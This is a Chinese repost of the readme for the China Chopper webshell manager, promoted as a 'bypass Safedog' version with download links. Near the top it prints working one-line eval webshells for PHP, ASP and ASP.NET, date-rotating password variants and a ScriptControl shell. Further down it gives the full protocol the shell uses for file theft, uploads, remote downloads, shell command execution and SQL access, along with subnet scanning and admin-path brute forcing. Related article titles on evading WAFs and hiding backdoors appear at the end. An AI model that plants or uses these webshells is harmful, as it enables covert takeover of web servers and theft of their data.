中国红色菜刀去后门(过狗)

下载请认准官方网站:http://www.maicaidao.com/

不过现在官方已经打不开了,很多朋友找不到下载地址,所以现在放出来,有需要的朋友可以自行下载!

下载地址:http://pan.baidu.com/s/1gfuoU4b

软件简介:

软件名称:中国菜刀(China chopper)
官方网站:http://www.maicaidao.com/
———————————————————————————————————-
免责申明:
请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果本厂家不承担任何责任!
———————————————————————————————————-
程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
———————————————————————————————————-

UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。

一、脚本客户端(包括但不限于EVAL)部分
1)基本信息
Eval服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP, ASP, ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下:
PHP: <?php @eval($_POST[‘chopper’]);?>
ASP: <%eval request(“chopper”)%>
ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item[“chopper”],”unsafe”);%>
(注意: ASP.NET要单独一个文件或此文件也是Jscript脚本)
Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
此模式可按需定制,比如只要浏览目录,或是只要虚拟终端功能,代码可以很简短。

随日期变化的连接密码, 服务端写法:
Asp.NET:
<%@ Page Language=”Jscript”%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format(“{0:yyyyMMdd}”,DateTime.Now.ToUniversalTime())+”37E4DD20C310142564FC483DB1132F36″, “MD5″).ToUpper()],”unsafe”);%>
PHP:
@eval($_POST[strtoupper(md5(gmdate(“Ymd”).”37E4DD20C310142564FC483DB1132F36″))]);
例如:菜刀的密码为chopper,在前面加三个字符,新密码为:{D}chopper
2)几大功能
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,
保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2. 虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。
3. 数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式连接的数据库。
如果精通SQL语法,何必还要PHPMYADMIN呢?而且,菜刀还支持任何脚本的数据库管理呢。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
4. 自写脚本:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。
可以在官网下载别人的CCC脚本,或分享你的得意之作。
注意:由于服务器的安全设置,某些功能可能不能正常使用。

3) 配置信息填写说明
—————————————————————————————
A) 数据库方面:
—————————————————————————–
PHP脚本:
<T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL中的一种
<H>主机地址<H> 主机地址可为机器名或IP地址,如localhost
<U>数据库用户</U> 连接数据库的用户名,如root
<P>数据库密码</P> 连接数据库的密码,如123455
<N>默认库</N> 默认连接的库名

<L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1

ASP和ASP.NET脚本:
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件

Customize 脚本:
<T>类型</T> 类型只能填XDB
<X>与Customize 脚本约定的配置信息</X>
菜刀自带的Customize.jsp数据库参数填写方法如下(两行):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
</X>
MYSQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/[email protected]:1521/test
</X>

B) 其它方面:
—————————————————————————–
添加额外附加提交的数据,如ASP的新服务端是这样的:
<%
Set o = Server.CreateObject(“ScriptControl”)
o.language = “vbscript”
o.addcode(Request(“SC”))
o.run “ff”,Server,Response,Request,Application,Session,Error
%>
那么,菜刀在配置处填入:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request(“pass”)):end+function</O>
然后以密码pass来连接即可。

提交功能前先POST额外的数据包:会话期间只提交一次。
<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>

默认终端程序路径设置示例:
<SHELL>/bin/sh</SHELL>

虚拟终端默认命令设置示例:
<CMD>whoami</CMD>

文件管理默认打开的目录设置示例:
<CD>c:\windows\temp\</CD>

3) HTTP登录验证
SHELL地址这样填 http://user:[email protected]/server.asp
用户名密码中的特殊字符可用URL编码转换。

4) 数据导入:在SHELL列表界面,右键有一项菜单,可以把其它的菜刀库导入到当前分类中。

二、安全扫描
蜘蛛爬行,绑定域名查询,目录爆破。
命令解释:
A) 查单一IP的绑定域名
{reverse_ip} {url:http://www.maicaidao.com/}
B) 扫描本C段开放的WEB服务器,并查询绑定域名
{reverse_ip_c} {url:http://www.maicaidao.com/}
C) 只扫描本C段开放的WEB服务器
{reverse_ip_c} {url:http://www.maicaidao.com/} {port}
D) 蜘蛛爬行
{spider} {url:http://www.maicaidao.com/}
E) 蜘蛛爬行,并设定爬行范围
{spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
F) 蜘蛛爬行,过滤重复URL加快速度
加上 {filter}
G) 爆破功能,%s为dict中的一行
flag:后面为返回的数据(含HTTP头部)中的特定关键字
加!!为不包含关键字为TRUE,否则包含关键字为TRUE
list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件
{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
{crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {dict:list.txt}

三、定时提醒
当闹钟来用吧, 周期:每月/每周/每日/只一次。

四、浏览器
就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
如果有ip.dat库,在状态栏会显示此网站的IP,国家代码。

五、其它部分
等待加入。

——————————————–
20110628版更新注意事项
缓存库最好重建一下。
——————————————–
文件说明:
——————————————————————
chopper.exe 菜刀程序
db.mdb 菜刀的主数据库
——————————————————————
cache.tmp 菜刀的缓存数据库(可删除)
readme.txt 你现在正在看的(可删除)
<CCC> 菜刀的自写脚本(可删除)
<Customize> Customize模式的服务端(可删除)
Customize.aspx 这是一个C#的示例服务端(全功能)
Customize.jsp 这是一个jsp的示例服务端(全功能)
Customize.cfm 这是一个cfm的示例服务端(文件管理,虚拟终端)

—-附—————————Customize模式菜刀和服务端通信接口—————————————————————–
———————————-其它语言的服务端代码可按此接口来编写(请参照Customize.jsp/Customize.cfm)———————
例:菜刀客户端填写的密码为pass,网页编码选的是GB2312(Jsp服务端会用到此参数)
注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记
注:返回的错误信息开头包含ERROR://
注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车
注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
———————————————————————————————————————————–

[得到当前目录的绝对路径]
提交:pass=A&z0=GB2312
返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表
示例:c:\inetpub\wwwroot\ C:D:E:K:
示例:/var/www/html/

[目录浏览]
提交:pass=B&z0=GB2312&z1=目录绝对路径
返回:先目录后文件,目录名后要加/,文件名后不要加/
示例:
目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n
文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n

[读取文本文件]
提交:pass=C&z0=GB2312&z1=文件绝对路径
返回:文本文件的内容

[写入文本文件]
提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容
返回:成功返回1,不成功返回错误信息

[删除文件或目录]
提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径
返回:成功返回1,不成功返回错误信息

[下载文件]
提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径
返回:要下载文件的内容

[上传文件]
提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)
返回:要下载文件的内容

[复制文件或目录后粘贴]
提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径
返回:成功返回1,不成功返回错误信息

[文件或目录重命名]
提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)
返回:成功返回1,不成功返回错误信息

[新建目录]
提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)
返回:成功返回1,不成功返回错误信息

[修改文件或目录时间]
提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-dd HH:mm:ss)
返回:成功返回1,不成功返回错误信息

[下载文件到服务器]
提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径
返回:成功返回1,不成功返回错误信息

[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]
提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令
返回:命令执行结果

[得到数据库基本信息]
提交:pass=N&z0=GB2312&z1=数据库配置信息
返回:成功返回数据库(以制表符\t分隔), 不成功返回错误信息

[获取数据库表名]
提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名
返回:成功返回数据表(以\t分隔), 不成功返回错误信息

[获取数据表列名]
提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名
返回:成功返回数据列(以制表符\t分隔), 不成功返回错误信息

[执行数据库命令]
提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令
返回:成功返回数据表内容, 不成功返回错误信息
注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。行中的每列后加上\t|\t标记,每行以标记\r\n为结束

========================

安全风险自控

时间: 2024-10-11 10:06:54

中国红色菜刀去后门(过狗)的相关文章

php一句话后门过狗姿势万千之传输层加工【三】

既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令. 当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理. 本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二 环境: 域名与服务器均为个人真实所有. 服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别. 对比环境: 服务器:a

PHP一句话后门过狗姿势万千之传输层加工

既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令. 当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理. 本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二 环境: 域名与服务器均为个人真实所有. 服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别. 对比环境: 服务器:a

红色版中国菜刀(20141213)正式发布 过狗红色菜刀

下载请认准官方网站:http://www.maicaidao.com/ 不过现在官方已经打不开了,很多朋友找不到下载地址,所以现在放出来,有需要的朋友可以自行下载! 下载地址:https://www.lanzous.com/i1xg3ib 软件简介: 软件名称:中国菜刀(China chopper)官方网站:http://www.maicaidao.com/------------------------------------免责申明:请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造

过狗菜刀?过安全狗中国菜刀。

最新专版过狗菜刀,过目前最新版V4.2安全狗! 1.支持过服务器安全狗V4.1.08893 2.支持过网站安全狗V3.3.09060 3.增加提权特殊命令功能 百度网盘:http://pan.baidu.com/s/1gdtiTTh 51CTO下载:http://down.51cto.com/data/2037909 (如有失效请上官网:www.cncaidao.net提交建议) ----------------------------------------------------------

php一句话后门过狗姿势万千之后门构造与隐藏【二】

第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被

PHP一句话后门过狗姿势万千之后门构造与隐藏

第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被

[转]中国最大的Webshell后门箱子调查,所有公开大马全军覆没

起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(20);error_reporting(0); define('u_b','/'); define('s_u','http:// 107.182.228.74/'); define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.c

中国技工都去哪儿了?

中国制造创造过奇迹,数以千万计产业工人的双手,辛勤劳作,向世界源源不断地输出物美价廉的产品,但奇迹的背后却满目心酸,抛开环境.溢价率这些东西不谈,单就流水工人的人性戕害就足以让人震惊,总的来说,这些工作机械.单调,从事者就好像养鸡场里的肉鸡,只需要2个小时就能望见一生:年轻人把自己装进防尘服中同世界隔离,最辛苦的是上夜班,流水线像个永动机一样从不停止,每每低头看表都只过了5分钟而已.有调查显示,流水线工人会慢慢变笨,笨到人类所能达到的愚蠢极限...这些似乎是骇人听闻的事儿,在中国已经连续发生了3

2016过狗菜刀下载 2016过狗刀 过狗菜刀下载

2016过狗菜刀 2016过狗刀公布 <ignore_js_op> <ignore_js_op> 过狗菜刀2016.rar (2.64 MB, 下载次数: 3)